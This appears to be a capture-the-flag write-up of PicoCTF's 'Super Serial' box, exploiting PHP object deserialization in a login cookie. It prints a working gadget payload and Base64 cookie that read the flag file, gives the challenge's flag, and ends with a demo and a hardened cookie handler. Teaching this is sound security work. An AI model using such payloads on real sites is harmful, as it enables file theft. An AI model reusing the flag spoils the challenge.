Introduction
Hey Amazing People!
Today we are going to go through an awesome capture-the-flag box created by my personal favourite, MADSTACKS. He is one hell of a creator! We are going to take a look at the Super Serial box (130 pts) from the web exploitation section of PicoCTF.
Given Details
Description
Try to recover the flag stored on this website http://mercury.picoctf.net:8404/
Hint: The flag is at ../flag
Let's Dig In
- The site lands on a login page.
- Looked up robots.txt.
- Found admin.phps listed there.
- Opened admin.phps, but it says the file is missing.
- So I tried the same trick on the index: index.phps served the highlighted PHP source of index.php (.phps is the extension Apache serves as syntax-highlighted source instead of executing it).
- The relevant part of the index.php source:
```php
<?php
require_once("cookie.php");
if(isset($_POST["user"]) && isset($_POST["pass"])){
    $con = new SQLite3("../users.db");
    $username = $_POST["user"];
    $password = $_POST["pass"];
    $perm_res = new permissions($username, $password);
    if ($perm_res->is_guest() || $perm_res->is_admin()) {
        // serialize -> base64 -> urlencode; cookie.php undoes this in reverse
        setcookie("login", urlencode(base64_encode(serialize($perm_res))), time() + (86400 * 30), "/");
        header("Location: authentication.php");
        die();
    } else {
        $msg = '<h6 class="text-center" style="color:red">Invalid Login.</h6>';
    }
}
?>
```
- The redirect points at authentication.php; requesting it directly returns 403 Forbidden.
- So I tried authentication.phps and got its source (the class header was cut off in the highlighted output, so I restore it here from the class used later on):
```php
<?php
class access_log {
    public $log_file;
    function __construct($lf) {
        $this->log_file = $lf;
    }
    // string conversion reads the log file: this is the gadget
    function __toString() {
        return $this->read_log();
    }
    function append_to_log($data) {
        file_put_contents($this->log_file, $data, FILE_APPEND);
    }
    function read_log() {
        return file_get_contents($this->log_file);
    }
}
require_once("cookie.php");
if(isset($perm) && $perm->is_admin()){
    $msg = "Welcome admin";
    $log = new access_log("access.log");
    $log->append_to_log("Logged in at ".date("Y-m-d")."\n");
} else {
    $msg = "Welcome guest";
}
?>
```
- Both files pull in cookie.php with require_once on their second line.
- cookie.phps served its source as well; the interesting part is:
```php
<?php
if(isset($_COOKIE["login"])){
    try{
        // user-controlled cookie goes straight into unserialize()
        $perm = unserialize(base64_decode(urldecode($_COOKIE["login"])));
        $g = $perm->is_guest();
        $a = $perm->is_admin();
    }
    catch(Error $e){
        // concatenating $perm calls its __toString()
        die("Deserialization error. ".$perm);
    }
}
?>
```
- The last section, which shows how the login cookie is handled, is what really caught my attention. The cookie is a serialised object that is Base64-encoded and then URL-encoded; cookie.php reverses those two steps and hands the result straight to unserialize(), so whatever class and properties I put in the cookie get instantiated on the server.
- I pasted the access_log class from authentication.php into an online PHP editor and added one line:
script.php
```php
<?php
class access_log
{
    public $log_file;
    function __construct($lf) {
        $this->log_file = $lf;
    }
    function __toString() {
        return $this->read_log();
    }
    function append_to_log($data) {
        file_put_contents($this->log_file, $data, FILE_APPEND);
    }
    function read_log() {
        return file_get_contents($this->log_file);
    }
}
// build the gadget: an access_log whose "log" is the flag file
echo(serialize(new access_log("../flag")));
?>
```
- The last line is mine. The server only ever builds an access_log pointing at access.log, which I cannot read or overwrite, so I serialise my own access_log whose log_file is ../flag, the path the hint gives. Note that log_file has to be public: a private or protected property serialises with a mangled name and would not match.
- I got the result:
O:10:"access_log":1:{s:8:"log_file";s:7:"../flag";}
- Base64-encoded it and got:
TzoxMDoiYWNjZXNzX2xvZyI6MTp7czo4OiJsb2dfZmlsZSI7czo3OiIuLi9mbGFnIjt9
- Went to index.php and created a new cookie named "login" with value TzoxMDoiYWNjZXNzX2xvZyI6MTp7czo4OiJsb2dfZmlsZSI7czo3OiIuLi9mbGFnIjt9 and path /authentication.php (the string has no characters that need URL-encoding, so no further encoding was required).
- Refreshed the page and the "Deserialization error" message printed the flag. What happens: unserialize() rebuilds my access_log object, calling is_guest() on it throws an Error because the method does not exist, and the catch block concatenates $perm into the message, which invokes __toString() → read_log() → file_get_contents("../flag").
### picoCTF{th15_vu1n_1s_5up3r_53r1ous_y4ll_c5123066}
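To see the whole chain without the live box, here is an added example (my own demo code, not part of the challenge) that reproduces the vulnerable cookie.php logic locally and then shows a hardened handler that the same cookie cannot abuse. The permissions class, the temporary flag path and the secret key are assumptions made for the demo.

```php
<?php
// Added demo, not the challenge's code: reproduces the Super Serial chain locally,
// then shows a handler that never instantiates classes from cookie data.

class access_log {
    public $log_file;
    function __construct($lf) { $this->log_file = $lf; }
    function __toString() { return $this->read_log(); }
    function append_to_log($data) { file_put_contents($this->log_file, $data, FILE_APPEND); }
    function read_log() { return file_get_contents($this->log_file); }
}

// Hypothetical stand-in for the challenge's permissions class (not the real one).
class permissions {
    public $username; public $password;
    function __construct($u, $p) { $this->username = $u; $this->password = $p; }
    function is_guest() { return $this->username === "guest"; }
    function is_admin() { return false; }
}

$flag_path = sys_get_temp_dir() . "/flag";            // constructed stand-in for ../flag
file_put_contents($flag_path, "picoCTF{demo_flag}\n");

// 1. Build the cookie exactly as index.php does, but with our gadget object inside.
$cookie = urlencode(base64_encode(serialize(new access_log($flag_path))));

// 2. Vulnerable logic (same shape as cookie.php): unserialize() restores an access_log,
//    so ->is_guest() throws an Error; the catch concatenates $perm, which runs
//    __toString() -> read_log() -> file_get_contents($flag_path).
function vulnerable_handler($cookie) {
    try {
        $perm = unserialize(base64_decode(urldecode($cookie)));
        $g = $perm->is_guest();
        $a = $perm->is_admin();
        return "ok";
    } catch (Error $e) {
        return "Deserialization error. " . $perm;  // leaks the file
    }
}

// 3. Hardened handler: store plain data (no class name) and HMAC it so the client
//    cannot forge or modify it. The key is a demo assumption; use a random secret.
const COOKIE_KEY = "replace-with-a-random-32-byte-secret";

function make_signed_cookie($obj) {
    $data = json_encode(get_object_vars($obj));     // fields only, never serialize()
    $mac  = hash_hmac("sha256", $data, COOKIE_KEY);  // hex, so it contains no "."
    return urlencode(base64_encode($mac . "." . $data));
}

function hardened_handler($cookie) {
    $raw = base64_decode(urldecode($cookie), true);
    if ($raw === false || strpos($raw, ".") === false) return "rejected";
    [$mac, $data] = explode(".", $raw, 2);
    if (!hash_equals(hash_hmac("sha256", $data, COOKIE_KEY), $mac)) return "rejected";
    $fields = json_decode($data, true);              // a plain array: nothing executes
    if (!is_array($fields)) return "rejected";
    $perm = new permissions($fields["username"] ?? "", $fields["password"] ?? "");
    return ($perm->is_guest() || $perm->is_admin()) ? "ok" : "rejected";
}

echo vulnerable_handler($cookie), "\n";              // prints the demo flag
echo hardened_handler($cookie), "\n";                // rejected: no valid MAC
echo hardened_handler(make_signed_cookie(new permissions("guest", "x"))), "\n"; // ok
unlink($flag_path);
```

The fix works on two levels: json_decode() gives back an array, so no attacker-chosen class (and no magic method such as __toString or __wakeup) is ever instantiated, and the HMAC means the server only accepts cookies it issued itself. If you must keep unserialize() for legacy data, at least pass `['allowed_classes' => false]` as its second argument so objects come back as __PHP_Incomplete_Class instead of live gadgets.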
Conclusion:
Pay attention to the small details and you will find wonders in them!
Hit me up on Twitter for some awesome one-liners to automate things.
I hope you enjoyed the article. Let's learn, earn and grow together with the infosec community.
Give me a follow if you want more content like this:
Twitter: https://twitter.com/0xManan/
LinkedIn: https://www.linkedin.com/in/manan-patel-4330101b4/